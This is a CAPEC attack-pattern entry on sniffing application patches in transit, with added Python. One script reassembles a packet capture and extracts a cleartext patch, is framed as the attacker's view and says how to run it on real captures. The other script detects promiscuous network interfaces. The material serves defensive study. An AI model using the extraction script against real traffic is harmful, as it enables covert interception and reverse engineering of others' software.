CAPEC-259 - Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Patching

Attackers can capture application code bound for an authorized client during patching and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.


  • Attack Methods (2)
      • API Abuse
      • Protocol Manipulation
  • Purposes (2)
      • Exploitation
      • Reconnaissance
  • Scopes (4)
      • "Varies by context" – Confidentiality
      • Modify files or directories – Integrity
      • Read files or directories – Confidentiality
      • Gain privileges / assume identity – Non-Repudiation, Authorization, Authentication, Accountability

Medium level: The attacker needs to set up a sniffer for long enough to capture a meaningful quantity of code, and the sniffer must not be detected on the network.

High level: The attacker needs to reverse engineer the captured binary code if need be.

The attacker must be able to place a sniffer in the path between the server and client without being detected. The targeted application must receive patches from the server.

The attacker needs the ability to capture communications between the client and server during patching. If encryption protects the client/server communication, the attacker additionally needs to lift key material from the client.

Step 1 (Explore) - Set up a sniffer

The attacker sets up a sniffer in the path between the server and the client and watches the traffic.

Technique ID: 1 - Environment(s) env-ClientServer

The attacker sets up a sniffer in the path between the server and the client.

Security Control ID: 1

Type: Detective

Check the network interfaces of the client and server hosts (e.g., with ifconfig or ipconfig) to see whether an adapter is running in promiscuous mode. This only reveals a sniffer running on the host being checked; a sniffer attached to a tap, a switch mirror port or a compromised router in the path does not change the endpoints' interface flags.

Security Control ID: 2

Type: Preventative

Encrypt all communications between the server and client, so that a passive capture yields ciphertext rather than application code.


Outcome ID: 1

Type: Success

The attacker successfully sets up a sniffer in the path between the server and client.

Outcome ID: 2

Type: Failure

The attacker could not set up a sniffer in the path between the server and client.



Step 1 (Exploit) - Capturing Application Code Bound for the Client During Patching

The attacker receives notification that the computer/OS/application has an available update for patching, loads the sniffer set up during the Explore phase, and extracts the patch code from the subsequent communication. The attacker then reverse engineers the captured code.

Technique ID: 1 - Environment(s) env-Web

The attacker loads the sniffer to capture the application code bound for the client during patching.

Technique ID: 2 - Environment(s) env-All

The attacker reverse engineers the captured code.
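The extraction step as working code, added here as an example and not part of the CAPEC entry: a stdlib-only Python script that reads a classic libpcap file (the format `tcpdump -w` writes), reassembles the server-to-client TCP stream by sequence number, and pulls the patch out of an unencrypted HTTP/1.1 response. The capture, the addresses and port, and the "patch" bytes are all constructed inline so the script runs offline; the out-of-order and retransmitted segments in the sample are there to show that a passive observer still recovers exactly the bytes the client received.

```python
"""Reassemble a cleartext patch download from a packet capture (stdlib only)."""
import hashlib
import socket
import struct

# Constructed sample data (not a real update): a small "patch" that the server
# sends to the client over plain HTTP/1.1, split across three TCP segments.
PATCH = b"\x7fELF" + b"update-payload-v2" * 8
SERVER, CLIENT = ("203.0.113.10", 80), ("198.51.100.7", 50123)

def ipv4_tcp_frame(src, dst, seq, payload):
    """Build an Ethernet/IPv4/TCP frame for the sample capture (checksums left zero)."""
    (sip, sport), (dip, dport) = src, dst
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, 6, 0, socket.inet_aton(sip), socket.inet_aton(dip))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload  # dummy MACs, EtherType IPv4

def pcap_bytes(frames):
    """Wrap frames in a classic libpcap file, as written by `tcpdump -w`."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # LINKTYPE_ETHERNET
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out

def tcp_segments(pcap):
    """Yield (src, dst, seq, payload) for every IPv4/TCP segment in an Ethernet pcap."""
    magic = struct.unpack_from("<I", pcap)[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("example handles Ethernet link-layer captures only")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack_from(endian + "IIII", pcap, off)
        frame, off = pcap[off + 16:off + 16 + incl], off + 16 + incl
        if frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = frame[14:]
        if ip[9] != 6:
            continue                                   # not TCP
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack_from("!HHI", tcp)
        doff = (tcp[12] >> 4) * 4
        yield ((socket.inet_ntoa(ip[12:16]), sport),
               (socket.inet_ntoa(ip[16:20]), dport), seq, tcp[doff:])

def reassemble(segments, src, dst):
    """Order one direction of a TCP stream by sequence number. Out-of-order and
    retransmitted segments are tolerated; a gap raises instead of yielding garbage."""
    parts = sorted((s, p) for a, b, s, p in segments if (a, b) == (src, dst) and p)
    if not parts:
        raise ValueError("no payload in that direction")
    data, expect = b"", parts[0][0]
    for seq, payload in parts:
        if seq > expect:
            raise ValueError("gap in stream at seq %d" % expect)
        data += payload[expect - seq:]        # skip bytes already seen (retransmits)
        expect = max(expect, seq + len(payload))
    return data

def http_body(stream):
    """Return the entity body of the first HTTP/1.1 response in the stream."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(b":") for line in head.split(b"\r\n")[1:])}
    length = int(headers[b"content-length"])
    if len(rest) < length:
        raise ValueError("response body truncated in capture")
    return rest[:length]

def extract_patch(pcap):
    """The attacker's view: server-to-client bytes reassembled into the patch file."""
    return http_body(reassemble(list(tcp_segments(pcap)), SERVER, CLIENT))

def sample_capture():
    """Constructed pcap: the middle segment is captured last and one is retransmitted."""
    resp = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
            b"Content-Length: %d\r\n\r\n" % len(PATCH)) + PATCH
    cuts = [(0, 40), (40, 100), (100, len(resp))]
    frames = [ipv4_tcp_frame(SERVER, CLIENT, 1000 + a, resp[a:b]) for a, b in cuts]
    return pcap_bytes([frames[0], frames[2], frames[1], frames[1]])

if __name__ == "__main__":
    patch = extract_patch(sample_capture())
    print(len(patch), "bytes, sha256", hashlib.sha256(patch).hexdigest())
```

To run it against a real capture, replace `sample_capture()` with the bytes of the pcap file and set `SERVER` and `CLIENT` to the observed endpoints. Against an update channel protected by TLS the same reassembly yields only ciphertext, which is the point of the preventative control; the attacker is then reduced to the key-material route named in the Inconclusive indicator.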

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

The attacker can capture the application code bound for the target.

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

The communication between the server and client is encrypted. The attacker may still be able to lift key material from the client.


Security Control ID: 1

Type: Detective

Check the network interface (e.g., with ifconfig) for promiscuous mode to detect the sniffer. As in the Explore step, this only finds a sniffer running on the host being checked, not one on a tap, mirror port or intermediate device.

Security Control ID: 2

Type: Preventative

Encrypt all communications between the server and client, so that a passive capture yields ciphertext rather than application code.


Outcome ID: 1

Type: Success

The attacker captures the application code bound for the target and reverse engineers the captured code.



Design: Encrypt all communication between the client and server.

Implementation: Use TLS (SSL), SSH or SCP for the patch channel.

Operation: Use "ifconfig/ipconfig" or other tools to detect a sniffer installed on hosts in the network. These tools only show promiscuous-mode adapters on the hosts you check; a sniffer on a tap, a switch mirror port or an intermediate device is not visible this way.
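The detective control named in Security Control 1 of both steps and in the Operation mitigation, as an added example (not part of the CAPEC entry): a Python check for Linux hosts that reads each interface's flags from sysfs and also parses `ip link show` output for the PROMISC flag. IFF_PROMISC (0x100) is the kernel's flag value from <linux/if.h>; the sample `ip link` output is constructed so the script runs offline.

```python
"""Detect a locally running sniffer: a NIC in promiscuous mode (Linux)."""
import os
import re

IFF_PROMISC = 0x100  # <linux/if.h>: set while any socket has promiscuous mode on

def promisc_from_flags(flags_text):
    """/sys/class/net/<dev>/flags holds the interface flags as hex, e.g. '0x1103'."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)

def promisc_from_ip_link(output):
    """Parse `ip link show` output; return the names of interfaces showing PROMISC."""
    found = []
    for line in output.splitlines():
        m = re.match(r"\d+:\s+([^:@]+)[^<]*<([^>]*)>", line)
        if m and "PROMISC" in m.group(2).split(","):
            found.append(m.group(1))
    return found

def scan_local_interfaces():
    """Live check on the host this runs on (Linux sysfs); returns promiscuous NICs.
    Host-local by design: it cannot see a sniffer on a tap, mirror port or router."""
    base = "/sys/class/net"
    if not os.path.isdir(base):
        return []
    hits = []
    for dev in sorted(os.listdir(base)):
        try:
            with open(os.path.join(base, dev, "flags")) as fh:
                if promisc_from_flags(fh.read()):
                    hits.append(dev)
        except OSError:
            continue
    return hits

# Constructed sample of `ip link show` output: eth0 has a sniffer attached.
SAMPLE_IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
"""

if __name__ == "__main__":
    print("sample output:", promisc_from_ip_link(SAMPLE_IP_LINK))
    print("this host:", scan_local_interfaces())
```

The Linux kernel also logs "device eth0 entered promiscuous mode" when the flag is raised, so forwarding kernel messages to central logging gives the same signal without polling. Either way the check is host-local: treat a clean result as one indicator, not as proof that no one is capturing the patch traffic somewhere in the path.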